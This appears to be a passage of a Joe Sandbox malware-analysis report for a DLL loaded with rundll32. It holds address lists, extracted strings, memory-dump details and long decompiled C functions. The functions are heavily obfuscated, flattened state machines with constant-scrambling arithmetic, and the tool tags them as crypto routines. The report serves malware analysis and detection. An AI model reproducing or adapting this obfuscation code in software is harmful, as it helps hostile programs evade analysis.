0x1001e3cf
0x1001e3d7
0x1001e3e2
0x1001e3ed
0x1001e3f8
0x1001e403
0x1001e40e
0x1001e419
0x1001e424
0x1001e42c
0x1001e434
0x1001e43c
0x1001e444
0x1001e44c
0x1001e454
0x1001e45c
0x1001e464
0x1001e46c
0x1001e477
0x1001e482
0x1001e48d
0x1001e495
0x1001e49d
0x1001e4a5
0x1001e4ad
0x1001e4b5
0x1001e4c0
0x1001e4d6
0x1001e4dd
0x1001e4e8
0x1001e4f0
0x1001e4fc
0x1001e501
0x1001e507
0x1001e50f
0x1001e517
0x1001e51f
0x1001e529
0x1001e52c
0x1001e538
0x1001e53c
0x1001e544
0x1001e54f
0x1001e55a
0x1001e565
0x1001e570
0x1001e57b
0x1001e586
0x1001e592
0x1001e595
0x1001e599
0x1001e5a1
0x1001e5a9
0x1001e5b3
0x1001e5bb
0x1001e5c3
0x1001e5c8
0x1001e5d0
0x1001e5df
0x1001e5e0
0x1001e5e4
0x1001e5ec
0x1001e5f4
0x1001e5fc
0x1001e604
0x1001e609
0x1001e611
0x1001e619
0x1001e626
0x1001e62a
0x1001e62e
0x1001e633
0x1001e63b
0x1001e643
0x1001e64b
0x1001e653
0x1001e65b
0x1001e663
0x1001e66b
0x1001e673
0x1001e680
0x1001e684
0x1001e68c
0x1001e697
0x1001e6a2
0x1001e6ad
0x1001e6b8
0x1001e6c3
0x1001e6ce
0x1001e6d6
0x1001e6de
0x1001e6e3
0x1001e6eb
0x1001e6f6
0x1001e701
0x1001e70c
0x1001e717
0x1001e71e
0x1001e729
0x1001e731
0x1001e739
0x1001e742
0x1001e746
0x1001e74e
0x1001e75b
0x1001e75f
0x1001e767
0x1001e76f
0x1001e777
0x1001e77f
0x1001e787
0x1001e78f
0x1001e79a
0x1001e7a5
0x1001e7b0
0x1001e7bb
0x1001e7c3
0x1001e7ce
0x1001e7d6
0x1001e7e4
0x1001e7e8
0x1001e7ed
0x1001e7f5
0x1001e7fd
0x1001e802
0x1001e809
0x1001e816
0x1001e81e
0x1001e823
0x1001e831
0x1001e834
0x1001e838
0x1001e840
0x1001e84b
0x1001e856
0x1001e861
0x1001e86c
0x1001e877
0x1001e882
0x1001e88a
0x1001e88f
0x1001e894
0x1001e89c
0x1001e8a7
0x1001e8b2
0x1001e8bd
0x1001e8c8
0x1001e8d3
0x1001e8de
0x1001e8e6
0x1001e8eb
0x1001e8f0
0x1001e8f0
0x1001e8f5
0x1001e8f5
0x1001e8f5
0x1001e8f5
0x1001e8fb
0x00000000
0x00000000
0x1001e901
0x1001ea28
0x1001ea29
0x1001ea2e
0x1001ea33
0x1001ea36
0x1001ea3c
0x00000000
0x1001ea3c
0x1001e907
0x1001e90d
0x1001e9f3
0x1001e9fd
0x1001ea02
0x1001ea07
0x1001ebf8
0x1001ea0d
0x1001ea0d
0x00000000
0x1001ea0d
0x1001e913
0x1001e915
0x1001e9b6
0x1001e9bb
0x1001e9c1
0x1001e9c2
0x00000000
0x1001e91b
0x1001e921
0x1001e98c
0x1001e997
0x1001e99d
0x1001e99e
0x00000000
0x1001e923
0x1001e929
0x1001ebec
0x1001e92f
0x1001e935
0x00000000
0x1001e93b
0x1001e940
0x1001e957
0x1001e95b
0x1001e960
0x1001e967
0x1001e96f
0x00000000
0x1001e96f
0x1001e935
0x1001e929
0x1001e921
0x1001e915
0x1001e90d
0x1001ebf9
0x1001ec05
0x1001ec05
0x1001ea4c
0x1001eb79
0x1001eb96
0x1001eba4
0x1001eba9
0x1001ebae
0x1001ebba
0x00000000
0x1001ebb0
0x1001ebb0
0x00000000
0x1001ebb0
0x1001ea52
0x1001ea58
0x1001eb3e
0x1001eb5c
0x1001eb60
0x1001eb68
0x1001eb6a
0x1001eb6f
0x00000000
0x1001ea5e
0x1001ea64
0x1001eaeb
0x1001eaf5
0x1001eafb
0x1001eafc
0x00000000
0x1001ea66
0x1001ea6c
0x00000000
0x1001ea72
0x1001ea72
0x1001ea85
0x1001eabe
0x1001eac3
0x1001eaca
0x1001ead2
0x00000000
0x1001ead2
0x1001ea6c
0x1001ea64
0x1001ea58
0x00000000
0x1001ebbf
0x1001ebbf
0x00000000

Strings

^*, xrefs: 1001E21C
fC, xrefs: 1001E4DD
0vz5, xrefs: 1001E40E
m2, xrefs: 1001E35A
!$, xrefs: 1001E74E
d/Q, xrefs: 1001E1DA
H, xrefs: 1001E4E8
'd, xrefs: 1001E78F
mO, xrefs: 1001E856
&o, xrefs: 1001E53C
C=wU, xrefs: 1001E787
q, xrefs: 1001E894
g0, xrefs: 1001E260
C, xrefs: 1001E8D3
.Y, xrefs: 1001E5D0
W}, xrefs: 1001E385
fA, xrefs: 1001E809

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
API String ID: 0-3046912973
Opcode ID: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
Instruction ID: a67a5d6662a05d5da01197eb55bbec18b74cc61d11ec80b6fdc783dee153aef3
Opcode Fuzzy Hash: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
Instruction Fuzzy Hash: 6B321671508380DFE3A8CF65C98AA4FBBE1FB84754F108A0DE5D9962A0D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10007E34, Relevance: 21.7, Strings: 17, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10007E34(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				void* _t497;
				intOrPtr _t500;
				intOrPtr _t502;
				intOrPtr _t505;
				void* _t510;
				intOrPtr _t514;
				intOrPtr _t516;
				intOrPtr _t524;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				void* _t543;
				signed int _t598;
				intOrPtr _t599;
				signed int _t600;
				intOrPtr _t604;
				signed int* _t605;
				signed int* _t606;
				void* _t611;

				_t605 =  &_v732;
				_v548 = _v548 & 0x00000000;
				_v608 = 0x8e77;
				_v544 = __edx;
				_t604 = __ecx;
				_t600 = 0xf92d88;
				_t598 = 0x7f;
				_v608 = _v608 / _t598;
				_v608 = _v608 ^ 0x0200011f;
				_v664 = 0x5ee6;
				_v664 = _v664 >> 6;
				_t527 = 0x74;
				_v664 = _v664 * 0x3a;
				_v664 = _v664 ^ 0x00004336;
				_v724 = 0x97d5;
				_v724 = _v724 / _t527;
				_v724 = _v724 | 0x73d16624;
				_t528 = 0x48;
				_v724 = _v724 / _t528;
				_v724 = _v724 ^ 0x019bc567;
				_v684 = 0xe6c9;
				_v684 = _v684 << 4;
				_t529 = 0x2a;
				_v684 = _v684 / _t529;
				_t530 = 0xc;
				_v684 = _v684 * 0x45;
				_v684 = _v684 ^ 0x0017da0f;
				_v596 = 0x84c3;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 ^ 0x00000094;
				_v716 = 0x73cc;
				_v716 = _v716 >> 5;
				_v716 = _v716 * 0x51;
				_v716 = _v716 + 0xffff7ccf;
				_v716 = _v716 ^ 0x000099a4;
				_v700 = 0xc2fe;
				_v700 = _v700 | 0x0147ff89;
				_v700 = _v700 >> 2;
				_v700 = _v700 + 0xffffed96;
				_v700 = _v700 ^ 0x0051cc5f;
				_v624 = 0x598b;
				_v624 = _v624 * 0x46;
				_v624 = _v624 / _t530;
				_v624 = _v624 ^ 0x00023e05;
				_v560 = 0x1a77;
				_v560 = _v560 / _t598;
				_v560 = _v560 ^ 0x000017c3;
				_v640 = 0x468b;
				_v640 = _v640 ^ 0xf8cef0f9;
				_v640 = _v640 ^ 0x157598e1;
				_v640 = _v640 ^ 0xedbb3f55;
				_v660 = 0x95cb;
				_v660 = _v660 ^ 0xe0385738;
				_t103 =  &_v660; // 0xe0385738
				_t531 = 0x34;
				_v660 =  *_t103 * 0x38;
				_v660 = _v660 ^ 0x0c6ae6d8;
				_v692 = 0x21c1;
				_v692 = _v692 / _t531;
				_t532 = 0x70;
				_v692 = _v692 * 0x25;
				_v692 = _v692 << 4;
				_v692 = _v692 ^ 0x00016ad5;
				_v592 = 0xa9db;
				_v592 = _v592 ^ 0x5846e700;
				_v592 = _v592 ^ 0x584631e9;
				_v600 = 0x3eca;
				_v600 = _v600 + 0x9bab;
				_v600 = _v600 ^ 0x0000ec74;
				_v672 = 0x247b;
				_v672 = _v672 + 0xffff7cea;
				_v672 = _v672 + 0xffff49cc;
				_v672 = _v672 ^ 0xfffef3f1;
				_v720 = 0x5bb8;
				_v720 = _v720 << 5;
				_v720 = _v720 << 0xe;
				_v720 = _v720 * 0x69;
				_v720 = _v720 ^ 0xf3c05410;
				_v604 = 0x12e;
				_v604 = _v604 ^ 0xcbcc0f39;
				_v604 = _v604 ^ 0xcbcc0717;
				_v676 = 0x4f1f;
				_v676 = _v676 + 0xffffd823;
				_v676 = _v676 ^ 0x00001628;
				_v668 = 0xa101;
				_v668 = _v668 / _t532;
				_v668 = _v668 << 7;
				_v668 = _v668 ^ 0x0000d0e8;
				_v712 = 0xf562;
				_v712 = _v712 + 0xe29d;
				_v712 = _v712 | 0xaf029352;
				_t533 = 0x2c;
				_v712 = _v712 / _t533;
				_v712 = _v712 ^ 0x03fa2878;
				_v584 = 0xa7c6;
				_v584 = _v584 ^ 0x2308cfbe;
				_v584 = _v584 ^ 0x23086838;
				_v696 = 0xba3e;
				_v696 = _v696 << 9;
				_v696 = _v696 ^ 0x7a641ee8;
				_v696 = _v696 >> 2;
				_v696 = _v696 ^ 0x1ec44f4b;
				_v568 = 0x7d1;
				_v568 = _v568 << 2;
				_v568 = _v568 ^ 0x00007750;
				_v704 = 0x3590;
				_v704 = _v704 * 0x4c;
				_v704 = _v704 << 2;
				_v704 = _v704 << 8;
				_v704 = _v704 ^ 0x3f9b76a0;
				_v576 = 0x6e4c;
				_v576 = _v576 << 8;
				_v576 = _v576 ^ 0x006e4c78;
				_v636 = 0xe1b3;
				_t534 = 0x38;
				_v636 = _v636 / _t534;
				_v636 = _v636 | 0xbc23d7c2;
				_v636 = _v636 ^ 0xbc23f6d4;
				_v644 = 0xc193;
				_v644 = _v644 + 0xffffe081;
				_v644 = _v644 | 0xe7ea23f6;
				_v644 = _v644 ^ 0xe7eab5c6;
				_v652 = 0xff18;
				_v652 = _v652 ^ 0x15e6b590;
				_v652 = _v652 | 0x9145bae2;
				_v652 = _v652 ^ 0x95e7a511;
				_v688 = 0x91dc;
				_v688 = _v688 << 0xf;
				_v688 = _v688 + 0xffffec69;
				_v688 = _v688 + 0x152;
				_v688 = _v688 ^ 0x48ede9e6;
				_v588 = 0xda26;
				_t535 = 0x43;
				_v588 = _v588 / _t535;
				_v588 = _v588 ^ 0x00003ef3;
				_v728 = 0x13e1;
				_v728 = _v728 << 5;
				_v728 = _v728 | 0x81597e77;
				_t536 = 0x67;
				_v728 = _v728 / _t536;
				_v728 = _v728 ^ 0x0141a54f;
				_v732 = 0xfe77;
				_v732 = _v732 ^ 0xa2bc77b9;
				_v732 = _v732 << 0xb;
				_t537 = 0x3d;
				_v732 = _v732 * 0x1f;
				_v732 = _v732 ^ 0xa57fc270;
				_v564 = 0xd716;
				_v564 = _v564 ^ 0x4072510d;
				_v564 = _v564 ^ 0x40729e8d;
				_v708 = 0xf6c2;
				_v708 = _v708 + 0xffff713e;
				_v708 = _v708 * 0xe;
				_v708 = _v708 / _t537;
				_v708 = _v708 ^ 0x00002963;
				_v580 = 0x83ac;
				_t538 = 0x4a;
				_v580 = _v580 / _t538;
				_v580 = _v580 ^ 0x000067e0;
				_v632 = 0xd307;
				_v632 = _v632 >> 0xb;
				_v632 = _v632 ^ 0x73d3f358;
				_v632 = _v632 ^ 0x73d3bdee;
				_v656 = 0x12d9;
				_v656 = _v656 | 0x78eb2603;
				_v656 = _v656 + 0xffffb5b9;
				_v656 = _v656 ^ 0x78eaf389;
				_v552 = 0x5776;
				_v552 = _v552 + 0x2f24;
				_v552 = _v552 ^ 0x00009a22;
				_v616 = 0x2c00;
				_v616 = _v616 + 0x792b;
				_v616 = _v616 + 0xffffa094;
				_v616 = _v616 ^ 0x00000aad;
				_v572 = 0x3f59;
				_v572 = _v572 | 0xe3450093;
				_v572 = _v572 ^ 0xe3451fd2;
				_v556 = 0x6ea6;
				_t539 = 0x1d;
				_t524 = _v544;
				_v556 = _v556 * 0x56;
				_v556 = _v556 ^ 0x002547d9;
				_v648 = 0xf811;
				_v648 = _v648 << 8;
				_v648 = _v648 ^ 0xcc5c85c7;
				_v648 = _v648 ^ 0xcca4883c;
				_v612 = 0xcfc1;
				_t599 = _v544;
				_v612 = _v612 * 0x33;
				_v612 = _v612 >> 1;
				_v612 = _v612 ^ 0x0014c5bf;
				_v620 = 0x3b04;
				_v620 = _v620 >> 3;
				_v620 = _v620 ^ 0x957054e4;
				_v620 = _v620 ^ 0x95705ef6;
				_v628 = 0x17ec;
				_v628 = _v628 / _t539;
				_v628 = _v628 + 0xffffc55c;
				_v628 = _v628 ^ 0xffffc912;
				_v680 = 0x1f47;
				_v680 = _v680 | 0x8760986b;
				_t540 = 0x6b;
				_v680 = _v680 / _t540;
				_v680 = _v680 + 0xeba5;
				_v680 = _v680 ^ 0x0144ccb9;
				while(1) {
					L1:
					_t497 = 0x22698256;
					while(1) {
						L2:
						_t541 = 0x37da4205;
						do {
							while(1) {
								L3:
								_t611 = _t600 - 0x1571d90b;
								if(_t611 > 0) {
									break;
								}
								if(_t611 == 0) {
									_t510 = E1000934C(_t541);
									__eflags = _t510 - E10014DBD();
									_t497 = 0x22698256;
									_t600 = 0x695d68;
									_t524 =  !=  ? 0x22698256 : 0xbd09969;
									while(1) {
										L2:
										_t541 = 0x37da4205;
										goto L3;
									}
								}
								if(_t600 == 0x695d68) {
									__eflags = _t524 - _t497;
									if(_t524 != _t497) {
										_t600 = 0xd0bbcc0;
										continue;
									} else {
										_push(_v608);
										E10004BDE(_v716, _v700,  &_v548, _v624, _t541);
										_t605 =  &(_t605[5]);
										asm("sbb esi, esi");
										_t600 = (_t600 & 0xff859553) + 0xd86276d;
										while(1) {
											L1:
											_t497 = 0x22698256;
											L2:
											_t541 = 0x37da4205;
											goto L3;
										}
									}
									L34:
								}
								if(_t600 != 0xf92d88) {
									if(_t600 == 0xd0bbcc0) {
										_push( &_v524);
										_push(0x10001318);
										_t516 = E10002628(_t604, _v544);
										__eflags = _t516;
										_t497 = 0x22698256;
										if(_t516 == 0) {
											__eflags = _t524 - 0x22698256;
											if(_t524 == 0x22698256) {
												E100078F0(_v548, _v560, _v640, _v660, _v692);
												_t605 =  &(_t605[3]);
												_t497 = 0x22698256;
											}
											_t600 = 0xd86276d;
											goto L2;
										} else {
											__eflags = _t524 - 0x22698256;
											_t541 = 0x37da4205;
											_t600 =  ==  ? 0x37da4205 : 0x39310db5;
											continue;
										}
									} else {
										if(_t600 == 0xd86276d) {
											return E100091CD(_v612, _v620, _v628, _t599, _v680);
										}
										goto L30;
									}
								}
								_push(_t541);
								_t543 = 0x24;
								_t514 = E100157E8(_t543);
								_t599 = _t514;
								__eflags = _t599;
								if(_t599 != 0) {
									_t600 = 0x1571d90b;
									while(1) {
										L1:
										_t497 = 0x22698256;
										goto L2;
									}
								}
								return _t514;
								goto L34;
							}
							__eflags = _t600 - _t541;
							if(_t600 == _t541) {
								_t500 = E1001D530(_v592,  &_v524, _v600, _v672,  &_v540, _v720, _v548, _v604);
								_t606 =  &(_t605[8]);
								__eflags = _t500;
								if(_t500 != 0) {
									E100078F0(_v540, _v676, _v668, _v712, _v584);
									E100078F0(_v536, _v696, _v568, _v704, _v576);
									_t606 =  &(_t606[6]);
								}
								E100078F0(_v548, _v636, _v644, _v652, _v688);
								_t605 =  &(_t606[3]);
								_t600 = 0x38dc6618;
								_t497 = 0x22698256;
								_t541 = 0x37da4205;
								goto L30;
							} else {
								__eflags = _t600 - 0x38dc6618;
								if(_t600 == 0x38dc6618) {
									 *((intOrPtr*)(_t599 + 0x20)) = _t604;
									_t502 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t599 + 0x10)) = _t502;
									 *0x10021400 = _t599;
									return _t502;
								}
								__eflags = _t600 - 0x39310db5;
								if(__eflags != 0) {
									goto L30;
								} else {
									_push(_v708);
									_push(0);
									_push(0);
									_push(_t541);
									_push(_v564);
									_push(_v732);
									_push( &_v524);
									_push( &_v540);
									_t505 = E100189F6(_v588, _v728, __eflags);
									_t605 =  &(_t605[8]);
									__eflags = _t505;
									if(_t505 != 0) {
										E100078F0(_v540, _v580, _v632, _v656, _v552);
										E100078F0(_v536, _v616, _v572, _v556, _v648);
										_t605 =  &(_t605[6]);
									}
									_t600 = 0x38dc6618;
									goto L1;
								}
							}
							goto L34;
							L30:
							__eflags = _t600 - 0x2870efef;
						} while (_t600 != 0x2870efef);
						return _t497;
					}
				}
			}

0x10007e34
0x10007e3a
0x10007e42
0x10007e52
0x10007e59
0x10007e5d
0x10007e64
0x10007e69
0x10007e70
0x10007e7b
0x10007e83
0x10007e8f
0x10007e92
0x10007e96
0x10007e9e
0x10007eae
0x10007eb2
0x10007ebe
0x10007ec3
0x10007ec7
0x10007ecf
0x10007ed7
0x10007ee2
0x10007ee7
0x10007ef2
0x10007ef3
0x10007ef7
0x10007eff
0x10007f0a
0x10007f12
0x10007f1d
0x10007f25
0x10007f2f
0x10007f33
0x10007f3b
0x10007f43
0x10007f4b
0x10007f53
0x10007f58
0x10007f60
0x10007f68
0x10007f75
0x10007f81
0x10007f85
0x10007f8d
0x10007fa1
0x10007fa8
0x10007fb3
0x10007fbb
0x10007fc3
0x10007fcb
0x10007fd3
0x10007fdd
0x10007fe5
0x10007fec
0x10007fef
0x10007ff3
0x10007ffb
0x1000800b
0x10008014
0x10008017
0x1000801b
0x10008020
0x10008028
0x10008033
0x1000803e
0x10008049
0x10008054
0x1000805f
0x1000806a
0x10008072
0x1000807a
0x10008082
0x1000808a
0x10008092
0x10008097
0x100080a1
0x100080a5
0x100080ad
0x100080b8
0x100080c3
0x100080ce
0x100080d6
0x100080e6
0x100080ee
0x100080fe
0x10008102
0x10008107
0x1000810f
0x10008117
0x1000811f
0x1000812b
0x1000812e
0x10008132
0x1000813a
0x10008145
0x10008150
0x1000815b
0x10008163
0x10008168
0x10008170
0x10008175
0x1000817d
0x10008188
0x10008190
0x1000819b
0x100081a8
0x100081ac
0x100081b1
0x100081b6
0x100081be
0x100081c9
0x100081d1
0x100081dc
0x100081ec
0x100081f1
0x100081f7
0x100081ff
0x10008207
0x1000820f
0x10008217
0x1000821f
0x10008227
0x1000822f
0x10008237
0x1000823f
0x10008247
0x1000824f
0x10008254
0x1000825c
0x10008264
0x1000826c
0x1000827e
0x10008283
0x1000828c
0x10008297
0x1000829f
0x100082a4
0x100082b0
0x100082b5
0x100082bb
0x100082c3
0x100082cb
0x100082d3
0x100082dd
0x100082e0
0x100082e4
0x100082ec
0x100082f7
0x10008302
0x1000830d
0x10008315
0x10008322
0x1000832e
0x10008332
0x1000833a
0x1000834c
0x1000834f
0x10008356
0x10008361
0x10008369
0x1000836e
0x10008376
0x1000837e
0x10008386
0x1000838e
0x10008396
0x1000839e
0x100083a9
0x100083b4
0x100083bf
0x100083ca
0x100083d5
0x100083e0
0x100083eb
0x100083f8
0x10008403
0x1000840e
0x10008423
0x10008426
0x1000842d
0x10008434
0x1000843f
0x10008447
0x1000844c
0x10008454
0x1000845c
0x1000846f
0x10008476
0x1000847d
0x10008484
0x1000848f
0x1000849a
0x100084a2
0x100084ad
0x100084b8
0x100084c8
0x100084cc
0x100084d4
0x100084dc
0x100084e4
0x100084f0
0x100084f3
0x100084f7
0x100084ff
0x10008507
0x10008507
0x10008507
0x1000850c
0x1000850c
0x1000850c
0x10008511
0x10008511
0x10008511
0x10008511
0x10008517
0x00000000
0x00000000
0x1000851d
0x10008660
0x1000866c
0x10008673
0x10008678
0x1000867d
0x1000850c
0x1000850c
0x1000850c
0x00000000
0x1000850c
0x1000850c
0x10008529
0x1000860b
0x1000860d
0x1000864b
0x00000000
0x1000860f
0x1000860f
0x1000862e
0x10008633
0x10008638
0x10008640
0x10008507
0x10008507
0x10008507
0x1000850c
0x1000850c
0x00000000
0x1000850c
0x10008507
0x00000000
0x1000860d
0x10008535
0x10008541
0x10008584
0x10008585
0x1000858c
0x10008592
0x10008594
0x1000859a
0x100085b0
0x100085b2
0x100085ce
0x100085d3
0x100085d6
0x100085d6
0x100085db
0x00000000
0x1000859c
0x1000859c
0x100085a3
0x100085a8
0x00000000
0x100085a8
0x10008543
0x10008549
0x00000000
0x1000856e
0x00000000
0x10008549
0x10008541
0x100085ed
0x100085f0
0x100085f1
0x100085f6
0x100085f9
0x100085fb
0x10008601
0x10008507
0x10008507
0x10008507
0x00000000
0x10008507
0x10008507
0x10008815
0x00000000
0x10008815
0x10008685
0x10008687
0x1000876b
0x10008770
0x10008773
0x10008775
0x10008791
0x100087b6
0x100087bb
0x100087bb
0x100087d5
0x100087da
0x100087dd
0x100087e2
0x100087e7
0x00000000
0x1000868d
0x1000868d
0x10008693
0x100087fa
0x100087fd
0x10008802
0x10008805
0x00000000
0x10008805
0x10008699
0x1000869f
0x00000000
0x100086a5
0x100086a5
0x100086b0
0x100086b2
0x100086b4
0x100086b5
0x100086bc
0x100086cb
0x100086d3
0x100086d4
0x100086d9
0x100086dc
0x100086de
0x100086fd
0x10008725
0x1000872a
0x1000872a
0x1000872d
0x00000000
0x1000872d
0x1000869f
0x00000000
0x100087ec
0x100087ec
0x100087ec
0x00000000
0x10008511
0x1000850c

Strings

g, xrefs: 10008356
h]i, xrefs: 10008523
+y, xrefs: 100083CA
{$, xrefs: 1000806A
Pw, xrefs: 10008190
t, xrefs: 1000805F
H, xrefs: 10008264
c), xrefs: 10008332
p(, xrefs: 100087EC
$/, xrefs: 100083A9
8W8, xrefs: 10007FE5
h]i, xrefs: 10008678
xLn, xrefs: 100081D1
1FX, xrefs: 1000803E
Qr@, xrefs: 100082F7
Y?, xrefs: 100083EB
^, xrefs: 10007E7B

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
API String ID: 0-1563294895
Opcode ID: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
Instruction ID: f7445f3b1b55f540d70f1e3b73910c5f00ddc209463d1ebaed6bac0f40c33f80
Opcode Fuzzy Hash: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
Instruction Fuzzy Hash: 0F32117250C3818FE368CF25C949A8BBBE1FBC5748F10891DE6D9962A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001F411, Relevance: 20.4, Strings: 16, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001F411() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				char _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				unsigned int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t493;
				signed int _t495;
				signed int _t497;
				void* _t499;
				void* _t505;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				void* _t533;
				void* _t539;
				void* _t581;
				signed int* _t586;

				_t586 =  &_v1764;
				_v1568 = 0x6bc4b7;
				_v1564 = 0;
				_v1616 = 0x7b31;
				_v1616 = _v1616 >> 5;
				_v1616 = _v1616 ^ 0x000003f0;
				_v1636 = 0x8aee;
				_v1636 = _v1636 << 6;
				_v1636 = _v1636 ^ 0xb9ff3183;
				_v1636 = _v1636 ^ 0x39dd8a02;
				_v1756 = 0x620;
				_v1756 = _v1756 | 0x6d559036;
				_v1756 = _v1756 << 8;
				_v1576 = 0;
				_t581 = 0x3875c21b;
				_t519 = 0x48;
				_v1756 = _v1756 / _t519;
				_v1756 = _v1756 ^ 0x01304efa;
				_v1684 = 0x5cfd;
				_t520 = 0x36;
				_v1684 = _v1684 * 0x52;
				_v1684 = _v1684 * 0x24;
				_v1684 = _v1684 ^ 0x04302f49;
				_v1628 = 0x396e;
				_v1628 = _v1628 * 0x28;
				_v1628 = _v1628 ^ 0x0008c3d7;
				_v1696 = 0x5408;
				_v1696 = _v1696 >> 0xc;
				_v1696 = _v1696 << 0xe;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x0002db53;
				_v1760 = 0x3df4;
				_v1760 = _v1760 * 0x61;
				_v1760 = _v1760 << 5;
				_v1760 = _v1760 / _t520;
				_v1760 = _v1760 ^ 0x000da470;
				_v1588 = 0x721a;
				_t521 = 0x47;
				_v1588 = _v1588 / _t521;
				_v1588 = _v1588 ^ 0x0000070f;
				_v1752 = 0x8c93;
				_v1752 = _v1752 << 0xa;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 | 0xe01a6e70;
				_v1752 = _v1752 ^ 0xf27a671c;
				_v1644 = 0xefc8;
				_t522 = 0x6d;
				_v1644 = _v1644 / _t522;
				_v1644 = _v1644 ^ 0x739099de;
				_v1644 = _v1644 ^ 0x7390cdd9;
				_v1596 = 0x1ffd;
				_v1596 = _v1596 ^ 0x86e06afb;
				_v1596 = _v1596 ^ 0x86e015b5;
				_v1652 = 0xc429;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 ^ 0x00006789;
				_v1600 = 0x57b4;
				_t523 = 0x7f;
				_v1600 = _v1600 / _t523;
				_v1600 = _v1600 ^ 0x00007042;
				_v1744 = 0xf601;
				_t524 = 0x2d;
				_v1744 = _v1744 * 0x77;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 * 0x2c;
				_v1744 = _v1744 ^ 0x397d78f9;
				_v1592 = 0x85ab;
				_v1592 = _v1592 << 4;
				_v1592 = _v1592 ^ 0x00082bb5;
				_v1720 = 0xd613;
				_v1720 = _v1720 + 0x2992;
				_v1720 = _v1720 << 1;
				_v1720 = _v1720 | 0xcb6149df;
				_v1720 = _v1720 ^ 0xcb61901b;
				_v1676 = 0x443b;
				_v1676 = _v1676 ^ 0xd199ed1f;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x34667475;
				_v1608 = 0x7ce3;
				_v1608 = _v1608 ^ 0x2b9fed51;
				_v1608 = _v1608 ^ 0x2b9fdb73;
				_v1728 = 0xb946;
				_v1728 = _v1728 * 0x68;
				_v1728 = _v1728 * 0x6e;
				_v1728 = _v1728 << 0xe;
				_v1728 = _v1728 ^ 0xda080bad;
				_v1712 = 0xe175;
				_v1712 = _v1712 / _t524;
				_t525 = 0x68;
				_v1712 = _v1712 * 0x62;
				_v1712 = _v1712 | 0xebea7309;
				_v1712 = _v1712 ^ 0xebebb48d;
				_v1736 = 0xa5be;
				_v1736 = _v1736 + 0xffff1e6a;
				_v1736 = _v1736 >> 8;
